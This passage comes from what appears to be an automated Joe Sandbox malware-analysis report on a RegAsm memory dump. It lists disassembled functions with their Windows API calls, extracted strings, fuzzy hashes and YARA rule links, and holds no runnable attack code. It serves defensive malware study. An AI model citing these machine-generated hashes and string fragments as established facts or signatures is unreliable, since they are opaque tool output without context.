                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 34e944f1193de25cad6c6268fa7f666e1cd852c0fe56dd2940ed258b4c47d558
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CCE06575505216EAFE3126669C2DB6E3F4EBB817B2F150123BC4596192DB60DC0981E0
                                                                                                                                                                                                                                  Function 0051D0B0 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0051CE70: SetLastError.KERNEL32(000005B6), ref: 0051CF1F
                                                                                                                                                                                                                                  • boost::exception::~exception.LIBCPMTD ref: 0051D0F4
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLastboost::exception::~exception
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2030483509-0
                                                                                                                                                                                                                                  • Opcode ID: 127a9da44362022521f033e18a0ae39a28386dc14d0daf764fa44cf252a51278
                                                                                                                                                                                                                                  • Instruction ID: 9d65acf10fa5897c4cb51372974a7a7b872250a04e27f6b01d4dc6cbf0bd463c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 127a9da44362022521f033e18a0ae39a28386dc14d0daf764fa44cf252a51278
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10F08C75840649EBCB04EF84D942BAEBF78FB44B20F10472CF426636D0DB352A00CB91
                                                                                                                                                                                                                                  Function 0050C650 Relevance: 1.3, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CharNextA.USER32(00000000,00000000,?,0050C6A6,0050CCEF,0000002E,00000000,?,0050CCEF), ref: 0050C660
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CharNext
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3213498283-0
                                                                                                                                                                                                                                  • Opcode ID: e0a00663e9917bfe8e8533278bc9554091e04477d1fbdc4f7316dc4c04211636
                                                                                                                                                                                                                                  • Instruction ID: dd8f41f4e9f27020e8a2b087f4928897653eaeb815a31aef6cf1a2e453e85e8b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e0a00663e9917bfe8e8533278bc9554091e04477d1fbdc4f7316dc4c04211636
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4F01C30A08248EBCB20CBA8C54046D7FF5AB4A301B24469AE80597241D632DF00AB80

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 00540905 Relevance: 15.2, APIs: 10, Instructions: 200fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetFileAttributesExW.KERNEL32(00440315,00000000,?), ref: 0054099D
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005409A7
                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(00440315,?), ref: 005409BE
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005409C9
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 005409D5
                                                                                                                                                                                                                                  • ___std_fs_open_handle@16.LIBCPMT ref: 00540A8E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFileFindLast$AttributesCloseFirst___std_fs_open_handle@16
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2340820627-0
                                                                                                                                                                                                                                  • Opcode ID: d42f15c2a6db202036fe90f2e2bfb0e91550acdf50c4596346993b15bfd7011d
                                                                                                                                                                                                                                  • Instruction ID: d438b49d91ebf40d0e8e65f5be02901b8155060303c3cbee24098b5dc06c8deb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d42f15c2a6db202036fe90f2e2bfb0e91550acdf50c4596346993b15bfd7011d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E0719B74A00619AFDB60CF28C888BEEBBB8FF15328F245695E954E32C1DB709D44CB51
                                                                                                                                                                                                                                  Function 0042CD50 Relevance: 14.6, APIs: 6, Strings: 2, Instructions: 551COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 0042CE3E
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 0042CEC0
                                                                                                                                                                                                                                    • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
                                                                                                                                                                                                                                    • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 0042CFCE
                                                                                                                                                                                                                                    • Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,00000000,eks,?), ref: 0042D3B5
                                                                                                                                                                                                                                    • Part of subcall function 0053F159: AcquireSRWLockExclusive.KERNEL32(0058F970,-0000AA73,?,00431732,00591F6C), ref: 0053F163
                                                                                                                                                                                                                                    • Part of subcall function 0053F159: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F196
                                                                                                                                                                                                                                    • Part of subcall function 0053F159: WakeAllConditionVariable.KERNEL32(0058F96C,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F1A1
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 0042D23D
                                                                                                                                                                                                                                    • Part of subcall function 0053F1AA: AcquireSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1B5
                                                                                                                                                                                                                                    • Part of subcall function 0053F1AA: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1EF
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 0042D537
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __aulldiv$ExclusiveLock$AcquireRelease$ByteCharConditionMultiVariableWakeWide
                                                                                                                                                                                                                                  • String ID: eks$j3l6lrek
                                                                                                                                                                                                                                  • API String ID: 2311560058-388657971
                                                                                                                                                                                                                                  • Opcode ID: 072f2b9ceb81a9fa8c865d9dfb1e546a149dd4610240c47455cb603f2730833a
                                                                                                                                                                                                                                  • Instruction ID: 656ff1fafc0402bd15cf97b20929c59a3b500642dc8d12530b5c4c7dbac2176f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 072f2b9ceb81a9fa8c865d9dfb1e546a149dd4610240c47455cb603f2730833a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48324A74E002289FEB24DF64DC55BEEBBB1BB88304F1081A9E909A7381D7746E85CF55
                                                                                                                                                                                                                                  Function 004242B0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 284registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 00424313
                                                                                                                                                                                                                                    • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
                                                                                                                                                                                                                                    • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 00424358
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 004244C9
                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,?,?,?,?,?,?,?,?,00000085,00000000,00000007,00000000,?,0000AA7A,00000000), ref: 004244EF
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00424542
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __aulldiv$CloseOpen
                                                                                                                                                                                                                                  • String ID: eks$j3l6lrek
                                                                                                                                                                                                                                  • API String ID: 2588155767-388657971
                                                                                                                                                                                                                                  • Opcode ID: 0e1b9639b1f5deafb3ca08739b64952efc4175f032e75f4f2edd6c91041de1fc
                                                                                                                                                                                                                                  • Instruction ID: 491dfe973cfee1e3c9ef4379c42601739974c236a8ee3e86afb2c1e71b1db1af
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e1b9639b1f5deafb3ca08739b64952efc4175f032e75f4f2edd6c91041de1fc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99C14A70E04218AFDB14CFA4DC91BAEBBB5FF89304F14809AE509A7391DB386A45CF55
                                                                                                                                                                                                                                  Function 004213A0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 284registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 00421403
                                                                                                                                                                                                                                    • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
                                                                                                                                                                                                                                    • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 00421448
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 004215B9
                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,?,?,?,?,?,?,?,?,00000085,00000000,00000007,00000000,?,0000AA7A,00000000), ref: 004215DF
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00421632
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __aulldiv$CloseOpen
                                                                                                                                                                                                                                  • String ID: eks$j3l6lrek
                                                                                                                                                                                                                                  • API String ID: 2588155767-388657971
                                                                                                                                                                                                                                  • Opcode ID: 9990e7e76fedeae98b5322bbc0df4055cc51598f7bc49c2b05d0fc539e1c4b9f
                                                                                                                                                                                                                                  • Instruction ID: 445fe49cdeaca878d9e7818506fae736db94ce0e42e47b148ad41fdb42a36499
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9990e7e76fedeae98b5322bbc0df4055cc51598f7bc49c2b05d0fc539e1c4b9f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5EC17C70E04218AFDB14CFA4DC95BAEBBB5BF98304F14809AE409B7391DB346A45CF55
                                                                                                                                                                                                                                  Function 00442070 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 455memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 00442204
                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,00000085,00000000,00000007,00000000,0000AA7A,00000000), ref: 0044222A
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0000AA7A,00000000), ref: 004423EE
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0000AA7A,00000000), ref: 004426C4
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast__aulldiv$AllocGlobal
                                                                                                                                                                                                                                  • String ID: eks$j3l6lrek
                                                                                                                                                                                                                                  • API String ID: 2907542317-388657971
                                                                                                                                                                                                                                  • Opcode ID: 25c6d4fb9024c041958110f4423a5b4c5d76298ade34168d39f4ab3b81fe8842
                                                                                                                                                                                                                                  • Instruction ID: 9f84a0050f59e8236fd2ba38f95f3d1390ff4bc6d5cb27f74b57c34b6ddbe6ce
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 25c6d4fb9024c041958110f4423a5b4c5d76298ade34168d39f4ab3b81fe8842
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6126CB0E002189FEB24CFA4CD51BEEBBB5BB48304F1481AAE509A7381D7785E85CF55
                                                                                                                                                                                                                                  Function 00567E9D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 188COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Offset
                                                                                                                                                                                                                                  • String ID: Bad dynamic_cast!
                                                                                                                                                                                                                                  • API String ID: 1587990502-2956939130
                                                                                                                                                                                                                                  • Opcode ID: 20f3693d08572e597083f22b303d3ab7abb4cb9912c833fe1fd9c5369746976c
                                                                                                                                                                                                                                  • Instruction ID: 975de1d90ee75d9ecaa86030a501d587ede8577b15ad686d0425f08efe5c4ed0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20f3693d08572e597083f22b303d3ab7abb4cb9912c833fe1fd9c5369746976c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41510972A04209ABCB14DF68DC499BABFA5FF89324F048669ED1597241EB31FD14C7A0
                                                                                                                                                                                                                                  Function 00561860 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,00561B72,00000002,00000000,?,?,?,00561B72,?,00000000), ref: 005618F9
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,00561B72,00000002,00000000,?,?,?,00561B72,?,00000000), ref: 00561922
                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,?,00561B72,?,00000000), ref: 00561937
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                  • Opcode ID: c2ab0fff28f4a76f52ff4344313262480a5841cb279491b13e57ae138434488c
                                                                                                                                                                                                                                  • Instruction ID: 40d7558f0b0175fc942c61baf373a59243dbf15b6e24df5cd838e8e648014c1c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2ab0fff28f4a76f52ff4344313262480a5841cb279491b13e57ae138434488c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE218622A00905AAEB348F64C911AB77EB7BF60F50B5E8424E94ADB201EB32DD41D358
                                                                                                                                                                                                                                  Function 0042D570 Relevance: 8.0, APIs: 5, Instructions: 492COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 0042D702
                                                                                                                                                                                                                                    • Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 0042D900
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __aulldiv
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3732870572-0
                                                                                                                                                                                                                                  • Opcode ID: c8c50dc5f89686b1c47334b22426cc4391644bdd7c0fa157914b1661be120d11
                                                                                                                                                                                                                                  • Instruction ID: bb14e70ad36b082a0b5e9c8789b4c92799cc7f9f4f447bf921ed53f564aa29e2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8c50dc5f89686b1c47334b22426cc4391644bdd7c0fa157914b1661be120d11
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB127EB1E00219AFEB24DF64DC51BAEBBB5BF88304F1481A9F809A7381DB346D448F55
                                                                                                                                                                                                                                  Function 00561A3C Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0055AF41: GetLastError.KERNEL32(00000000,00553EAB,0055E4B5), ref: 0055AF45
                                                                                                                                                                                                                                    • Part of subcall function 0055AF41: SetLastError.KERNEL32(00000000,00000000,-000A8750,00000006,000000FF), ref: 0055AFE7
                                                                                                                                                                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00561B44
                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00561B82
                                                                                                                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00561B95
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00561BDD
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00561BF8
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 415426439-0
                                                                                                                                                                                                                                  • Opcode ID: ca024633b9754248d0d0cfe8ded1d1c962b50105e441bf64056eb0b1e61b4ea5
                                                                                                                                                                                                                                  • Instruction ID: 9d7a95eafc06635e98c18416b46754a86e572d1fc1e9b3110dad2ce25cbd1492
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca024633b9754248d0d0cfe8ded1d1c962b50105e441bf64056eb0b1e61b4ea5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D519471A00A069FEB10DFA5CC45BBE7BB8FF44700F184469E915E7291EBB09D44CB65
                                                                                                                                                                                                                                  Function 00441480 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 311COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0053F1AA: AcquireSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1B5
                                                                                                                                                                                                                                    • Part of subcall function 0053F1AA: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1EF
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 00441791
                                                                                                                                                                                                                                    • Part of subcall function 0053F159: AcquireSRWLockExclusive.KERNEL32(0058F970,-0000AA73,?,00431732,00591F6C), ref: 0053F163
                                                                                                                                                                                                                                    • Part of subcall function 0053F159: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F196
                                                                                                                                                                                                                                    • Part of subcall function 0053F159: WakeAllConditionVariable.KERNEL32(0058F96C,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F1A1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireRelease$ConditionVariableWake__aulldiv
                                                                                                                                                                                                                                  • String ID: ^)<$eks$j3l6lrek
                                                                                                                                                                                                                                  • API String ID: 2808616827-1691098573
                                                                                                                                                                                                                                  • Opcode ID: 83d74b34876a2772d019437f0c55076331529412956233cee1c19d92ad37e1c6
                                                                                                                                                                                                                                  • Instruction ID: 61ddee64e97e81d89b636c2aae87605fd75d4fc85ae8e501c6fc247a7cddca84
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83d74b34876a2772d019437f0c55076331529412956233cee1c19d92ad37e1c6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88E16670D002589FDF14DFA9D881BEEBBB1BF89304F1481AAE409A7351DB346A85CF65
                                                                                                                                                                                                                                  Function 005610C7 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 254COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0055AF41: GetLastError.KERNEL32(00000000,00553EAB,0055E4B5), ref: 0055AF45
                                                                                                                                                                                                                                    • Part of subcall function 0055AF41: SetLastError.KERNEL32(00000000,00000000,-000A8750,00000006,000000FF), ref: 0055AFE7
                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,?,?,?,?,?,00556E86,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00561186
                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00556E86,?,?,?,00000055,?,-00000050,?,?), ref: 005611BD
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00561320
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                                                                                                                                                                  • String ID: utf8
                                                                                                                                                                                                                                  • API String ID: 607553120-905460609
                                                                                                                                                                                                                                  • Opcode ID: 125a8fdb11863665becb5fb8a9e623b02eeda480228334a53646febdf7755d45
                                                                                                                                                                                                                                  • Instruction ID: c229f9fa798894be58daefa86f0deebb0b3adf3289c2bac1009a216d3c08dae4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 125a8fdb11863665becb5fb8a9e623b02eeda480228334a53646febdf7755d45
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B715A71A00B07AADB24AB75CC4ABBB7FA8FF45700F18452AF905DB181EB70D944D758
                                                                                                                                                                                                                                  Function 00552DA0 Relevance: 6.5, APIs: 4, Instructions: 455COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 7505400ce6ba04d7e6a24cd4f4b2d4ed70d869f0fa5c6f3eb332725e7596dd30
                                                                                                                                                                                                                                  • Instruction ID: 98593d961832b577bb604902065ba2b3044358f249b4719abe734af665d25c4e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7505400ce6ba04d7e6a24cd4f4b2d4ed70d869f0fa5c6f3eb332725e7596dd30
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84025F75E006199BDF14CFA8D8906ADFBF1FF48315F14816AE919E7380D731AA45CB90
                                                                                                                                                                                                                                  Function 004210E0 Relevance: 6.3, APIs: 4, Instructions: 252COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 0042114D
                                                                                                                                                                                                                                    • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
                                                                                                                                                                                                                                    • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 004211CB
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 00421290
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __aulldiv
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3732870572-0
                                                                                                                                                                                                                                  • Opcode ID: 775faa42a7d552b4bdd8f93d78419dba34c0cdce023d96a9e4ae6639acb04b62
                                                                                                                                                                                                                                  • Instruction ID: b60834f5db5e1552b2b962e335da81e27a52cddb86fc4325a32176b2e4c97051
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 775faa42a7d552b4bdd8f93d78419dba34c0cdce023d96a9e4ae6639acb04b62
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 119170B5E00208AFEB14DFA4DC51FAEBBB9FB98714F208119F904BB2D4D77469018B65
                                                                                                                                                                                                                                  Function 005406BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
